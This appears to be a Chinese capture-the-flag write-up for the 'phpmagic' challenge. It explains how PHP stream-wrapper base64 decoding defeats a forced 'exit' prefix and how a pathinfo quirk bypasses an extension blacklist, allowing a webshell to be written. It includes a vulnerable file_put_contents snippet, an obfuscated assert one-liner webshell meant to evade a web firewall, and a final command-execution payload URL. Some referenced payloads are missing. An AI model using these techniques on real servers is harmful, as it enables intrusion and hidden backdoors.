php伪协议绕过限制写shell

这是在 code-breaking 中遇到的一道题目，名为：easy - phpmagic。题目地址： http://51.158.75.42:8082

整个代码逻辑很简单，需要关注的点就两个。一个是 第17-18行 处存在命令字符串格式化，而这里的格式化变量 $domain 经过了 escapeshellarg 函数的处理，没有其他攻击点结合，很难绕过。另外一个点是 第25行 的文件操作，我们会发现文件名 $log_name 变量完全可控，而文件内容 $output 也是部分可控（文件内容还经过了 htmlspecialchars 函数处理）。由于写入内容是部分可控，而文件名是完全可控，这就很容易让人联想到 PHP伪协议 的使用。举个例子，如果有下面这么一段代码，请问要如何利用该代码进行 getshell ？

<?php file_put_contents($_GET['filename'], '<?php exit;?>' . $_GET['content']);

我们可以看到这个问题和上面的题目本质上是一样的，文件名完全可控，而写入内容前存在不可控部分，这部分甚至会影响我们 webshell 的时候用，然而我们却可以利用 PHP伪协议 轻松绕过，达到 getshell 目的。 payload 如下：

这里假设我们要写入的内容是 <?php phpinfo(); 字符串，该字符串的 base64 编码为： PD9waHAgcGhwaW5mbygpOw== ，但是我们上面的payload中前面却多了一个A，这个A是我随意输入的，目的是为了和前面的字符凑成4的倍数进行 base64 解码而不影响我们 shell 本身。这里有个知识点，php的 base64_decode 函数在遇到除了 [a-zA-Z0-9+/] 之外的字符时会自动跳过，而且会将每4个字符作为一个单位进行解码。上面写入的内容前面拼接了 <?php exit;?> 字符串，真正被解码的，只有 phpexit 7个字符。为了不影响后续解码出来的 <?php phpinfo(); 所以我们要再在前面填充一个字符。这里特性之前也被用在过狗一句话中：

<?php
$a = base64_decode('JF9___QT1N____UWyd____hJ10='); ## 当中的下划线并不会被解码，只是起混淆作用
assert($a);
//assert($_POST[a]);
?>

进过上述例子的讲解，相信大家应该都明白了原理，那我们就继续来看题目。首先文件名变量 $log_name 由 $_SERVER[‘SERVER_NAME’] 和 $_POST[‘log’] 决定。 $_POST[‘log’] 自不必说，我们来看 PHP 手册中对 $_SERVER[‘SERVER_NAME’] 的说明：

可以看到，如果在 apache2 环境下，没有设置 UseCanonicalName = On 和 ServerName ， $_SERVER[‘SERVER_NAME’] 的值可以由客户端控制。简单测试如下：

在看明白上述内容后，我们最后还需要绕过题目 第23行 处的 pathinfo 函数对文件后缀名的判断，这里用了 in_array 的强判断（第3个参数为true），就不用考虑弱类型绕过了，关注点应该放在 pathinfo 函数上。在PHP手册的 User Contributed Notes 部分，我们还是看到了该函数获取结果不准确的问题。如下：

其中第二种写法 /var/www/html/1.php/./ 在 file_put_contents 函数中，会被处理成 /var/www/html/1.php （具体原因可以参考： php & apache2 &操作系统之间的一些黑魔法 ），而在 pathinfo 函数中，返回的结果为空字符串，这样也绕过了题目中黑名单的检测，所以最终的解题 payload 如下：

http://......./xx.php?cmd=var_dump(scandir('../../../'));highlight_file('../../../flag_phpmag1c_ur1');

参考

php & apache2 &操作系统之间的一些黑魔法